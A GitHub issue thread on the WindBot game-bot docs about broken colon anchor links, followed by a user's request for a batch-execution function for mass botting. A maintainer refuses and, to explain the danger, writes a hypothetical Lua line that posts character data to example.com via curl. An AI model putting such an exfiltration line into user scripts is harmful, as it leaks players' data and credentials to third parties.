### ISSUE TITLE
Links to functions with colon don't work

### ISSUE THREAD

**Issue by jtremblay1** [Tibia-WindBot/WindBot-Docs#51]
Your links:

#functions-DB:setvalue
#functions-DB:getvalue

dont work.

**Comment by rmobis** [comment]
Indeed. That's because, apparently, the colon (`:`) isn't really liked by browsers on anchor links. I'll see if I can get it fixed.

**Comment by rmobis** [comment]
Actually, this was fixed on August 16th (https://github.com/Tibia-WindBot/WindBot-Docs/commit/65c7b4d00daa926ce3741ab5c5f1fbc996538ef8) but it seems @lucasterra never got to push it to the server.

**Comment by jtremblay1** [comment]
Hey, so I'm a web developer and Im working on a mass botting project, and I was wondering if it's possible to make a function that simple executes a batch file. From there, i can execute whatever i want on the machine, send email alerts, update a site, whatever.

**Comment by lucasterra** [comment]
@jtremblay1 I'm afraid you can't. We don't have this kind of function for security reasons. Imagine if a scripter distributed a script with something like this:

```lua
execbatch('curl', '--data', '"name=' .. $name .. '&id=' .. $id .. '"', 'https://example.com')
```

Sure, that's not THAT bad, he sent your character `$name` and `$id`. But now what if somehow he managed to get access to the user's account name / password (because those values are in the bot for the reconnect function, but they're not accessible in any ways).

I understand how valuable it would be to be able to call web pages for logging, but I'd rather not expose it in the wild.

Oh, but you can do this using a .txt file. You enable 'file watching' on your external script, and you send updates to your website whenever this file is modified.

**Comment by jtremblay1** [comment]
Well, what I was actually thinking is that the function could simply execute a batch file. What is IN the batch file would be up to the user. I would not make it so that the function executes batch commands themselves. That way. any script that is distibuted would have to have a batch file seperately, which would be obvious. Secondly, I don't see how that would be YOUR problem as the software producer. I mean, in essence, the current bot could send a letter with the username and password to a character on the same server as the botter. I know a batch file could be really bad if in the wrong hands, but people just need to be responsible and verify the scripts they download before using them. IMO anyways.

**Comment by jtremblay1** [comment]
I mean, imagine the potential. You create a batch file that opens up more Tibias and Windbots, in the event you need them. What I was thinking, is you have one character that is always logged on, and when you are ready, you PM him a specific phrase, and at that moment it will execute a script that logs in 10-20 chars for a magebomb simultaneously. All sorts of cool things like that. Of course, I know you could accomplish the same thing ONCE the tibia clients are up and running and the bots are up and running, but that would slow down the machine unnecessarily when not using this. IDK, just a thought on making the bot even more powerful.

**Comment by rmobis** [comment]
This is something that has been discussed a lot since the release of WindBot. If you wish to continue the discussion, please do so in the forums, where this is appropriate.

Now, regarding this issue, the solution has now been deployed and should be working.
